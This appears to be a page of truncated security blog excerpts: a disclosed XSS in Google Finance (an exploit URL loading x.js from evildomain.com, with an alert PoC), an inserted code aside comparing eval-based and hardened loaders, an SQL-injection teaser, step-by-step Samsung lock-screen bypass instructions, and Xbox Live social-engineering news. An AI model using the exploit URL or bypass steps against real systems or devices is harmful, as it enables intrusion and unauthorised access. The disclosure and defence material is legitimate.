
Posts

XSS in Google Finance

On July 11 2013, I reported to Google Security an XSS vulnerability I discovered in the google.com main domain, which required no user interaction. It is due to a glitch in Google Finance, which is hosted on google.com/finance, that allows tricking the JavaScript application for plotting charts (in particular, source file /finance/f/sfe-opt.js) into loading a file hosted on an external domain and eval()-ing its content as JavaScript code. This exploit does not require any user interaction; it's just a matter of clicking on a URL. Steps to reproduce: just click on this URL (now fixed): https://www.google.com/finance?chdet=1214596800000&q=NASDAQ:INTC&ntsp=2&ntrssurl=https://evildomain.com/x.js . File x.js contains the following proof-of-concept code for demonstration purposes: alert(document.domain); The file has to be hosted over HTTPS. The remote JavaScript is executed. How does it work? Here is th...
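The loading pattern the post describes, a query parameter whose target is fetched and whose body is passed to eval(), shown here as an added example that is not the Google Finance code: the vulnerable loader beside a hardened one that only accepts same-origin URLs and parses the response as data instead of evaluating it. The function names, the ntrssurl handling, the trusted origin, and the fake fetch table standing in for the network are all assumptions constructed for the example.

```javascript
// Added example, not code from Google Finance or from the original post.
// Demonstrates: attacker-controlled URL parameter -> fetch -> eval(), and a fix.

// Assumed trusted origin of the application (assumption, not from the post).
const SAFE_ORIGIN = "https://www.google.com";

// Constructed stand-in for the network: URL -> response body.
// The "evildomain.com" body runs arbitrary code, then yields a feed-shaped object.
const FAKE_RESPONSES = {
  "https://www.google.com/finance/feed.js": '{"items":3}',
  "https://evildomain.com/x.js": 'globalThis.pwned = "owned", {"items":0}',
};

function fakeFetch(url) {
  if (!(url in FAKE_RESPONSES)) throw new Error("no response for " + url);
  return FAKE_RESPONSES[url];
}

// Vulnerable: the parameter is used as-is and the response is executed as code.
// Wrapping in parentheses is the old "evaluate the feed as a JS literal" idiom;
// it also means an attacker body can run statements before yielding a value.
function loadNewsFeedVulnerable(queryString) {
  const url = new URLSearchParams(queryString).get("ntrssurl");
  const body = fakeFetch(url);
  return eval("(" + body + ")"); // attacker code runs in this page's origin
}

// Hardened: resolve the parameter against the trusted origin, reject anything
// that does not land on that origin (absolute, protocol-relative, etc.), and
// parse the response as JSON so a response can never execute.
function loadNewsFeedHardened(queryString) {
  const raw = new URLSearchParams(queryString).get("ntrssurl");
  if (raw === null) return null;
  let url;
  try {
    url = new URL(raw, SAFE_ORIGIN); // "//evildomain.com/x.js" resolves off-origin
  } catch {
    return null;
  }
  if (url.origin !== SAFE_ORIGIN) return null;
  try {
    return JSON.parse(fakeFetch(url.href));
  } catch {
    return null; // malformed or non-JSON body is rejected, not executed
  }
}
```

Run the vulnerable loader with the attacker's parameter and the global `pwned` appears, which is exactly what the real proof of concept did with `document.domain`; the hardened loader returns `null` for the same input and only returns data for a same-origin path.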

Learn about SQL injection based Hacks

Put on your black hats folks, it's time to learn some genuinely interesting things about SQL injection. Now remember: y'all play nice with the bits and pieces you're about to read, ok? SQL injection is a particularly interesting risk for a few different reasons: It's getting increasingly hard to write vulnerable code due to frameworks that automatically parameterise inputs, yet we still write bad code. You're not necessarily in the clear just because you use stored procedures or a shiny ORM (you're aware that SQLi can still get through these, right?); we still build vulnerable apps around these mitigations. It's easily detected remotely by automated tools which can be orchestrated to crawl the web searching for vulnerable sites, yet we're still putting them out there. It remains number one on the OWASP Top 10 for a very good reason: it's common, it's very easy to exploit and the impact of doing so is severe. One little injection risk in one little fe...

How to Hack Samsung Phone Screen Lock

I have discovered another security flaw in Samsung Android phones. It is possible to completely disable the lock screen and get access to any app, even when the phone is "securely" locked with a pattern, PIN, password, or face detection. Unlike another recently released flaw, this doesn't rely quite so heavily on ultra-precise timing. Video. Of course, if you are unable to download a screen unlocker, this security vulnerability still allows you to dial any phone number and run any app! HOWTO: From the lock screen, hit the emergency call button. Dial a non-existent emergency services number, e.g. 0. Press the green dial icon. Dismiss the error message. Press the phone's back button. The app's screen will be briefly displayed. This is just about long enough to interact with the app. Using this, you can run and interact with any app / widget / settings menu. You can also use this to launch the dialler. From there, you can dial any phone...

Xbox Live accounts hacked

Allegedly, the hackers who targeted Krebs did so because he helped to reveal the method by which they have been compromising the accounts of "Microsoft employees who work on the Xbox Live gaming platform," Krebs writes. The method apparently involves acquiring and then utilizing the employees' social security numbers along with some social engineering to obtain access to those accounts. "Attackers are targeting high-profile Microsoft employees by social engineering other companies." In a statement given to The Verge, Microsoft confirmed that "a handful of high-profile Xbox LIVE accounts held by current and former Microsoft employees" have in fact been compromised. However, Microsoft denies that it in any way collects or utilizes SSNs in conjunction with Xbox Live accounts. "We are aware that a group of attackers are using several stringed social engineering techniques to compromise the accounts of a handful of high-profile Xbox LIVE accoun...